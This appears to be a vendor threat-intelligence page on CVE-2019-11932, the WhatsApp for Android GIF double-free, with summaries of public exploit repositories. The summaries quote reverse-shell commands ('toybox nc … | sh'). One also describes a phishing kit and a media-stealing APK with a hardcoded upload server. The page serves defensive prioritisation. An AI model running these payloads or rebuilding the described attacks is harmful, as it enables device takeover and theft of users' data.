CVE-2019-11932 is a double-free vulnerability in the DDGifSlurp function in decoding.c of android-gif-drawable versions before 1.2.18. Applications that use the affected library to parse a specially crafted GIF image, including WhatsApp for Android versions before 2.19.244, may be vulnerable to remote code execution or denial of service.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
7 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (4 hidden).
This repository contains a working exploit for CVE-2019-11932, a double-free vulnerability in WhatsApp for Android (prior to version 2.19.244). The exploit is implemented in C and Java as part of an Android application project. The core exploit logic is in 'exploit.c' and 'MyApplication2/app/src/main/cpp/gif/exploit.c', which generate a malicious GIF file. The payload in the GIF is designed to trigger the vulnerability when the file is viewed in WhatsApp's gallery, leading to remote code execution in the WhatsApp process. The payload can be customized to execute arbitrary shell commands, such as opening a reverse shell to a remote IP and port (e.g., 192.168.2.72:4444). The Java code in 'MainActivity.java' demonstrates how to generate and write the malicious GIF on an Android device. The exploit requires knowledge of memory addresses (system() and a suitable gadget), which must be obtained via an information disclosure vulnerability. The attack can be performed locally (via a malicious app) or remotely (by sending the GIF as a document via WhatsApp). The repository includes build scripts, Android project files, and supporting C code for GIF manipulation.
This repository provides an operational exploit for CVE-2019-11932, a double-free vulnerability in WhatsApp for Android's GIF image parsing. The exploit is implemented in C and consists of several files: 'exploit.c' (main exploit logic and GIF crafting), 'egif_lib.c' (GIF encoding support), 'gif_lib.h' (GIF library header), and 'build.py' (Python script to compile the C code). The exploit generates a malicious GIF file containing a payload that, when processed by a vulnerable WhatsApp client, triggers remote code execution. The payload is a reverse shell command ('toybox nc 192.168.2.72 4444 | sh'), which connects back to the attacker's server. The README provides usage instructions, emphasizing the need to replace hardcoded addresses for system() and a gadget, and to send the GIF as a Document via WhatsApp. The exploit requires some manual adjustment (address replacement) and an information disclosure vulnerability to obtain the necessary addresses, but otherwise is fully functional and weaponized for targeted attacks. The main attack vectors are file-based (malicious GIF) and network-based (reverse shell connection).
This repository is an exploit generator for CVE-2019-11932, a remote code execution vulnerability in WhatsApp for Android (prior to version 2.19.244). The exploit works by generating a specially crafted GIF file that, when sent to a victim and opened via WhatsApp, triggers a buffer overflow and executes a reverse shell command on the victim's device. The repository contains C source files ('exploit.c', 'egif_lib.c', 'gif_lib.h') for generating the malicious GIF, and a Bash script ('start.sh') that automates the process, including compiling the code and prompting the user for the attacker's IP and port. The README provides usage instructions and context. The exploit is operational, requiring the attacker to set up a netcat listener and social engineer the victim into opening the GIF as a document. The main payload is a reverse shell using 'busybox nc <attacker_ip> <port> | sh'. The exploit targets WhatsApp for Android versions prior to 2.19.244.
This repository is a proof-of-concept exploit for CVE-2019-11932, a double-free vulnerability in WhatsApp for Android's GIF parsing library. The repository contains four files: a README with usage instructions, two C source files (exploit.c and egif_lib.c), and a GIF library header (gif_lib.h). The exploit works by generating a specially crafted GIF file that, when processed by a vulnerable WhatsApp installation, triggers remote code execution. The payload embedded in the GIF launches a reverse shell to an attacker-controlled IP and port (default example: 192.168.2.72:4444). The attacker must set up a listener (e.g., using netcat) and modify the IP in the source code before compiling. The exploit demonstrates a real-world attack chain and provides operational shell access if successful. The code is self-contained, with custom GIF encoding logic, and is not part of any exploit framework.
This repository contains a full exploit for CVE-2019-11932, a double-free vulnerability in WhatsApp for Android's GIF image parsing. The exploit is implemented in C and Java, with supporting files for building both a standalone binary and an Android application. The core exploit logic is in 'exploit.c' and 'MyApplication2/app/src/main/cpp/gif/exploit.c', which generate a specially crafted GIF file ('exploit.gif'). This file, when sent as a document to a WhatsApp user and opened in the WhatsApp Gallery, triggers a buffer overflow and executes a command to open a reverse shell to the attacker's server (hardcoded as 192.168.2.72:4444). The Java Android app automates the generation and storage of the malicious GIF. The exploit requires the attacker to know the addresses of system() and a suitable ROP gadget, which must be patched into the exploit before use. The repository is well-structured, with clear separation between exploit logic, supporting libraries, and Android app scaffolding. No detection scripts or fake code are present; this is a functional exploit with operational payload.
This repository is a multi-component toolkit for attacking WhatsApp users via several methods: 1. **whatsapp_rce**: Implements an exploit for CVE-2019-11932 (WhatsApp GIF RCE). The 'start.sh' script automates the creation of a malicious GIF file that, when sent to a vulnerable WhatsApp for Android user (version <2.19.244), can trigger remote code execution and provide a reverse shell to the attacker. The exploit leverages a crafted GIF file and social engineering to convince the victim to open it in WhatsApp's gallery. The payload is customizable and weaponized for operational use. 2. **whatsapp_hack**: Contains a phishing kit that clones the WhatsApp Web login page. The attacker runs a Python Flask server ('server.py') and a Selenium-based script ('grabber.py') to automate the process. When a victim scans the QR code on the fake page, the attacker's browser session is authenticated as the victim, granting full access to their WhatsApp Web account. The kit includes templates, static files, and scripts to serve and update the QR code in real time. 3. **whatshack**: An Android malware builder. The provided bash script ('whatshack.sh') automates the creation of a malicious APK that, when installed on a victim's device, recursively searches for WhatsApp media files in '/storage/emulated/0/WhatsApp/Media/' and uploads them to a hardcoded remote server (http://159.89.214.31:4426/upload_files.php). The Java code requests storage permissions and exfiltrates all found files. The script also supports obfuscation and port forwarding for C2 communication. 4. **whatsapp-messages-hack**: A CPA (Cost Per Action) landing page template designed for social engineering, not a technical exploit. It is used to lure users into performing actions for affiliate marketing, often under the guise of hacking WhatsApp messages. Overall, the repository provides weaponized, operational tools for: - Remote code execution on WhatsApp for Android via GIF files (CVE-2019-11932) - Phishing WhatsApp Web sessions via a cloned login page - Exfiltrating WhatsApp media files from Android devices via a malicious APK - Social engineering via fake hacking landing pages The codebase is diverse, including Python, C, Bash, Java, and PHP, and is structured into separate directories for each attack vector. The repository is not part of a known exploit framework but is a collection of standalone, weaponized attack tools.
This repository provides an automated exploit generator for CVE-2019-11932, a remote code execution vulnerability in WhatsApp for Android (prior to version 2.19.244). The repository contains two files: a README.md with usage instructions and a Bash script (start.sh) that automates the process of downloading required GIF library files, generating a C exploit source file, compiling it, and producing a malicious .GIF payload. The exploit works by crafting a .GIF file that, when sent to a victim via WhatsApp (as a document) and viewed in the gallery, triggers code execution on the victim's device. The payload establishes a reverse shell to an attacker-controlled host and port using 'toybox nc'. The exploit targets WhatsApp Messenger on Android devices running vulnerable versions. The attack vector is network-based, requiring the attacker to send the malicious file and the victim to interact with it. The repository is operational, providing a working exploit with a customizable payload (attacker's host and port).
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A double-free vulnerability in an image processing library used by WhatsApp, identified as CVE-2019-11932. This flaw can be triggered by processing specially crafted GIF images, potentially allowing remote code execution on Android mobile phones.
A double-free vulnerability in an image processing library used by WhatsApp, identified as CVE-2019-11932. This flaw can be triggered by processing specially crafted GIF images, potentially allowing remote code execution on Android mobile phones.
A double-free vulnerability in an image processing library used by WhatsApp, identified as CVE-2019-11932. This flaw can be triggered by processing specially crafted GIF images, potentially allowing remote code execution on Android mobile phones.
A double-free vulnerability in an image processing library used by WhatsApp, identified as CVE-2019-11932. This flaw can be triggered by processing specially crafted GIF images, potentially allowing remote code execution on Android mobile phones.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.